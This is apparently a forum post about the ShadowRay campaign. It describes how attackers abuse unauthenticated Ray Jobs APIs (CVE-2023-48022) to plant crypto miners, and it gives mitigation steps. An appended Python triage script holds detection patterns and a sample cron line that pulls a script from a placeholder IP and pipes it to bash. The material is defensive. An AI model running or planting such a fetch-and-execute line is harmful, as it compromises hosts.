
New ShadowRay Attacks Hack Ray Clusters and Turn Them Into Crypto-Mining Machines

johny899

I’d like to bring your attention to a new cyber security issue I’ve learned about. This one is called ShadowRay and is able to commandeer Ray clusters to then mine cryptocurrency. Seems intense, right? If you use Ray for AI or high workloads, you should be aware of it.

What’s Going On?

Hackers have successfully exploited a vulnerability in Ray. They exploit this vulnerability to access servers that are publicly exposed on the internet. After breaching the server, they will then get the server to run crypto-mining software to earn money for themselves.

In reality, here are the basics:

• They are employing a bug with the name CVE-2023-48022.
• This bug allows them to run any job on a Ray cluster with no password.
• Over 230,000 Ray Servers are publicly exposed and exploitable.
• Their primary goal is to run a Monero crypto miner (XMRig).
• They steal data, capture passwords, and may also utilize the server for DDoS.

All of this is running silently, meaning you likely wouldn’t even know it’s going on.

How the Attack Works

Step 1: Getting Access

The hacker interacts with the Jobs API in Ray. Since it has no login, and no restrictions in place, the hacker simply submits a command to the Jobs API and Ray executes the command.

Step 2: Actions Taken by Hacker Once Inside

Once they gain access to your server, they take the following actions:
  • Check your CPU and GPU capabilities.
  • If you have a strong server (8 cores or more), they will begin mining from it.
  • They will only use 60% of the CPU so you do not get suspicious.
  • They will install cron jobs and system files to stay in your system.
  • They will block other miners so that only their miner runs.
They will also do these activities:
  • Steal data from your machine.
  • Open a door to your server so they can come back at will.
  • Use your server to conduct DDoS attacks.
  • Use AI-written code to avoid making errors, provide anonymity, and hide better.

Why is This Important

If you run Ray clusters this should concern you. A lot of people think Ray only runs in trusted networks, when in fact many of these servers are open to the public internet. That is what hackers take advantage of.

What Happens When You’re Attacked?

  • Your server gets really slow.
  • Your cloud bill gets even bigger.
  • Your data can be stolen.
  • A hacker could use your computer to attack someone else.

What You Should Do

Here’s what you do to protect yourself:
  • Stop public access to Ray (use firewalls).
  • Implement a login/password for the Ray Dashboard and Jobs API.
  • Keep an eye on your CPU for unusually high usage.
  • Look for cron jobs, or unknown processes.
Please take this bug seriously. If you cannot fix it right now, at a minimum, isolate the server so that hackers cannot easily reach it.
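
The checks listed under "What You Should Do", as an added example that is not part of the original post: a small Python triage script that flags a Ray dashboard/Jobs API listener bound beyond loopback, cron lines that download a script and pipe it to a shell, and processes that look like XMRig. It assumes Ray's default dashboard port 8265 and Linux `ss -ltnp`, `crontab -l` and `ps -eo pid,args` output as input; the function names and all sample data are constructed for illustration.

```python
import ipaddress
import re

RAY_DASHBOARD_PORT = 8265  # assumption: Ray's default dashboard/Jobs API port
# Constructed samples of `ss -ltnp`, `crontab -l` and `ps -eo pid,args` output.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:8265 0.0.0.0:* users:(("python3",pid=2101,fd=41))
LISTEN 0 128 [::1]:8265   [::]:*    users:(("python3",pid=2101,fd=42))
"""
SAMPLE_CRON = """\
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * curl -fsSL http://203.0.113.10/u.sh | bash
"""
SAMPLE_PS = """\
 2101 python3 train.py
 4477 /tmp/.cache/xmrig
"""
# Heuristics only: a renamed miner binary will not match MINER_HINTS.
CRON_FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b")
MINER_HINTS = re.compile(r"xmrig|stratum\+(tcp|ssl)://", re.IGNORECASE)

def exposed_ray_listeners(ss_output, port=RAY_DASHBOARD_PORT):
    """Return listening sockets on `port` that are bound beyond loopback."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN" or not fields[3].endswith(f":{port}"):
            continue
        # Drop the port, IPv6 brackets and any %interface suffix.
        host = fields[3].rpartition(":")[0].strip("[]").split("%")[0]
        if host in ("*", ""):
            host = "0.0.0.0"  # wildcard bind = every interface
        if not ipaddress.ip_address(host).is_loopback:
            exposed.append(fields[3])
    return exposed

def suspicious_cron_lines(crontab_text):
    """Return non-comment cron lines that download a script and pipe it to a shell."""
    return [l for l in crontab_text.splitlines()
            if not l.lstrip().startswith("#") and CRON_FETCH_EXEC.search(l)]

def miner_processes(ps_output):
    """Return PIDs whose command line mentions XMRig or a stratum pool URL."""
    rows = (line.split(None, 1) for line in ps_output.splitlines())
    return [int(r[0]) for r in rows
            if len(r) == 2 and r[0].isdigit() and MINER_HINTS.search(r[1])]

if __name__ == "__main__":
    print("exposed Ray listeners:", exposed_ray_listeners(SAMPLE_SS))
    print("suspicious cron lines:", suspicious_cron_lines(SAMPLE_CRON))
    print("possible miner PIDs:", miner_processes(SAMPLE_PS))
```

A clean result from the process check does not rule out a miner, so pair it with the CPU monitoring mentioned above.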
 